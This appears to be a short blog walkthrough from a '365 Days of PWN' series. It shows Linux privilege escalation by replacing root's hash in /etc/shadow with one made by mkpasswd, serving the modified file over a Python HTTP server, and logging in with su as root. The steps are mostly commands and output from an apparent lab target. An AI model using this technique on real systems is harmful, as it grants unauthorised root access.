Day 40: Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win

Scenario

Original File

root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Generate a new Shadow Hash

root@kali:~/# mkpasswd  -m sha-512 -S saltsalt -s 
Password: pwned123
$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20

Modified File

root:$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Now Write the File via Vulnerability and Profit

root@kali:~/# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.150 - - [08/Feb/2019 03:27:11] "GET /shadow HTTP/1.1" 200

Easy Root

daisy@vulnerable:~/# su root
Password: pwned123
root@vulnerable:/# id
uid=0(root) gid=0(root) groups=0(root)

Security Researcher / 365 Days of PWN

Security Researcher / 365 Days of PWN